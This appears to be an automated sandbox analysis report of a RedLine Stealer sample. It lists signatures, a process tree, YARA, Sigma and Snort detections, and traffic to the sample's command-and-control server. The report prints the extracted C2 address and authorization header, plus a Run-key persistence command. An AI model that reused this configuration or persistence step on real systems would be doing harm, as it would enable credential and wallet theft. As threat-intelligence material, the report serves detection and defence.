Windows Analysis Report
SysrI6zSkJ.exe

Overview

General Information

Sample name: SysrI6zSkJ.exe (renamed because original name is a hash value)
Original sample name: 2e501240ec8b9aab46d76a6504e44882.exe
Analysis ID: 1402122
MD5: 2e501240ec8b9aab46d76a6504e44882
SHA1: 1a97d7662e66502faa5a7718565bb362eb6f27bd
SHA256: 582cf0470ba0d2c2ef2c3fee83442db0e345656f7d7c46ee5b613998fdd6ee00
Tags: exe, RedLineStealer

Detection

RedLine
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected EXE embedded in BAT file
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SysrI6zSkJ.exe (PID: 6472 cmdline: C:\Users\user\Desktop\SysrI6zSkJ.exe MD5: 2E501240EC8B9AAB46D76A6504E44882)
    • reg.exe (PID: 6596 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6620 cmdline: cmd.exe /c C:\ProgramData\WinNet\embedded.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • embedded.exe (PID: 6904 cmdline: C:\ProgramData\WinNet\embedded.exe MD5: DB408CB75C1D0DA769C19A6CBBE60D87)
        • reg.exe (PID: 7068 cmdline: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6940 cmdline: cmd.exe /c C:\ProgramData\WinNet\AnyDesk.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AnyDesk.exe (PID: 6256 cmdline: C:\ProgramData\WinNet\AnyDesk.exe MD5: A21768190F3B9FEAE33AAEF660CB7A83)
            • AnyDesk.exe (PID: 5768 cmdline: "C:\ProgramData\WinNet\AnyDesk.exe" --local-service MD5: A21768190F3B9FEAE33AAEF660CB7A83)
            • AnyDesk.exe (PID: 7072 cmdline: "C:\ProgramData\WinNet\AnyDesk.exe" --local-control MD5: A21768190F3B9FEAE33AAEF660CB7A83)
        • cmd.exe (PID: 2504 cmdline: cmd.exe /c C:\ProgramData\WinNet\p.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 7076 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • gg.exe (PID: 2228 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
    • cmd.exe (PID: 6664 cmdline: cmd.exe /c C:\ProgramData\WinNet\p.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7016 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • gg.exe (PID: 6160 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
  • rundll32.exe (PID: 7292 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • gg.exe (PID: 7632 cmdline: "C:\ProgramData\WinNet\gg.exe" MD5: 20AB063F206EB8115FDE1479E05C245E)
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "67.203.7.148:2909", "Authorization Header": "1c494bfb642e6b40ce5b6d4207377297"}
Source | Rule | Description | Author | Strings
SysrI6zSkJ.exe | JoeSecurity_EXEembeddedinBATfile | Yara detected EXE embedded in BAT file | Joe Security |

dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

C:\ProgramData\WinNet\gg.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
C:\ProgramData\WinNet\embedded.exe | JoeSecurity_EXEembeddedinBATfile | Yara detected EXE embedded in BAT file | Joe Security |

00000007.00000002.2884514638.000001A0BAD00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
7.2.embedded.exe.1a0bad00098.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.SysrI6zSkJ.exe.231d8f00098.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
7.2.embedded.exe.1a0bad00098.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
14.0.gg.exe.7a0000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c C:\ProgramData\WinNet\p.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6664, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , ProcessId: 7016, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\WinNet\gg.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 6596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Repository
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentImage: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentProcessId: 6472, ParentProcessName: SysrI6zSkJ.exe, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, ProcessId: 6596, ProcessName: reg.exe
Source: Process started | Author: Florian Roth (Nextron Systems): Data: Command: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentImage: C:\Users\user\Desktop\SysrI6zSkJ.exe, ParentProcessId: 6472, ParentProcessName: SysrI6zSkJ.exe, ProcessCommandLine: REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Repository /t REG_SZ /F /D C:\ProgramData\WinNet\gg.exe, ProcessId: 6596, ProcessName: reg.exe
Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c C:\ProgramData\WinNet\p.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6664, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\WinNet\p.vbs" , ProcessId: 7016, ProcessName: wscript.exe
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
03/03/24-13:32:21.412111 | 2046056 | 2909 | 49738 | TCP | A Network Trojan was detected
03/03/24-13:32:12.962499 | 2043231 | 49730 | 2909 | TCP | A Network Trojan was detected
03/03/24-13:32:05.128395 | 2046056 | 2909 | 49729 | TCP | A Network Trojan was detected
03/03/24-13:32:05.256436 | 2046056 | 2909 | 49730 | TCP | A Network Trojan was detected
03/03/24-13:31:59.867235 | 2046045 | 49730 | 2909 | TCP | A Network Trojan was detected
03/03/24-13:31:59.719964 | 2046045 | 49729 | 2909 | TCP | A Network Trojan was detected
03/03/24-13:31:59.883479 | 2043234 | 2909 | 49729 | TCP | A Network Trojan was detected
03/03/24-13:32:00.028789 | 2043234 | 2909 | 49730 | TCP | A Network Trojan was detected
03/03/24-13:32:16.020247 | 2046045 | 49738 | 2909 | TCP | A Network Trojan was detected
03/03/24-13:32:16.182547 | 2043234 | 2909 | 49738 | TCP | A Network Trojan was detected
03/03/24-13:32:10.977333 | 2043231 | 49729 | 2909 | TCP | A Network Trojan was detected
03/03/24-13:32:26.512386 | 2043231 | 49738 | 2909 | TCP | A Network Trojan was detected

AV Detection

Source: 0.2.SysrI6zSkJ.exe.231d8f00098.0.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": "67.203.7.148:2909", "Authorization Header": "1c494bfb642e6b40ce5b6d4207377297"}
Source: C:\ProgramData\WinNet\embedded.exe | ReversingLabs: Detection: 58%
Source: C:\ProgramData\WinNet\gg.exe | ReversingLabs: Detection: 71%
Source: SysrI6zSkJ.exe | ReversingLabs: Detection: 39%
Source: unknown | HTTPS traffic detected: 185.229.191.44:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 64.31.23.26:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: SysrI6zSkJ.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.00000000030E2000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-64\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdb source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_app\win_app.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2884055986.0000000000C79000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\win_dwm\win_dwm.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: SAS.pdbR source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\dwm_dda-32\privacy_feature\privacy_feature.pdb source: AnyDesk.exe, 00000010.00000002.2885333394.00000000012CA000.00000004.00000001.01000000.00000008.sdmp, AnyDesk.exe, 00000010.00000003.1654541625.0000000003044000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: SAS.pdb source: AnyDesk.exe, 00000010.00000003.1654541625.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.exe, 00000010.00000002.2885333394.000000000128E000.00000004.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\Users\anyadmin\Documents\anydesk\release\app-32\win_loader\AnyDesk.pdb source: AnyDesk.exe, 00000010.00000002.2886245081.0000000001473000.00000002.00000001.01000000.00000008.sdmp
                                Source: Binary string: C:\b\s\w\ir\x\w\sdk\out\ReleaseX64\dart_precompiled_runtime_product.exe.pdbd source: SysrI6zSkJ.exe, 00000000.00000000.1626990978.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2892782013.00007FF6F6DDE000.00000002.00000001.01000000.00000003.sdmp, SysrI6zSkJ.exe, 00000000.00000002.2888383971.00000231DAA00000.00000004.00001000.00020000.00000000.sdmp, embedded.exe, 00000007.00000000.1634535755.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp, embedded.exe, 00000007.00000002.2888967759.00007FF73BE8E000.00000002.00000001.01000000.00000004.sdmp
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 0654899Bh | 18_2_06548768
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 06549C67h | 18_2_06549508
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 06549465h | 18_2_065491A0
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 0654D020h | 18_2_0654CB28
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 18_2_06542681
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 18_2_065423B0
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 063F89A3h | 24_2_063F8770
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 063FF864h | 24_2_063FF597
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 063FB107h | 24_2_063FA99B
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 24_2_063F2680
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then inc dword ptr [ebp-20h] | 24_2_063F23B0
Source: C:\ProgramData\WinNet\gg.exe | Code function: 4x nop then jmp 063FD121h | 24_2_063FD109

Networking

Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49729 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49729 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49730 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49730 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49729
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49730
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49729
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49730
Source: Traffic | Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49738 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49738 -> 67.203.7.148:2909
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 67.203.7.148:2909 -> 192.168.2.4:49738
Source: Traffic | Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 67.203.7.148:2909 -> 192.168.2.4:49738
Source: Malware configuration extractor | URLs: 67.203.7.148:2909
Source: global traffic | TCP traffic: 192.168.2.4:49729 -> 67.203.7.148:2909
Source: Joe Sandbox View | IP Address: 185.229.191.44
Source: Joe Sandbox View | ASN Name: AS-COLOAMUS
Source: Joe Sandbox View | JA3 fingerprint: c91bde19008eefabce276152ccd51457
Source: unknown | TCP traffic detected without corresponding DNS query: 67.203.7.148
                                Source: unknown. DNS traffic detected: queries for: boot.net.anydesk.com
                                Source: unknown. HTTP traffic detected: POST /httpapi HTTP/1.1 Host: api.playanext.com User-Agent: AnyDesk/8.0.8 Accept: */* Content-Length: 352 Content-Type: application/x-www-form-urlencoded api_key=c1426bd258099fa69f62933b466d4b77&event=[{"event_type":"check_offer","user_id":"f9be650e732b28999541a3d29be8e5d3","session_id":1709469125922881,"ip":"$remote","event_properties":{"method_used":"Google Chrome Criteria Checker","offer_product":"Google Chrome","distributor":"AnyDesk","distributor_product":"AnyDesk","user_country":"Switzerland"}}
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002EEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                                Source: gg.exe, 0000000E.00000002.1811038264.0000000003C2B000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000360D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.0000000003345000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000036B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.000000000353B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                                Source: gg.exe, 0000000E.00000002.1805798526.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, gg.exe, 00000012.00000002.1807448246.00000000032BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
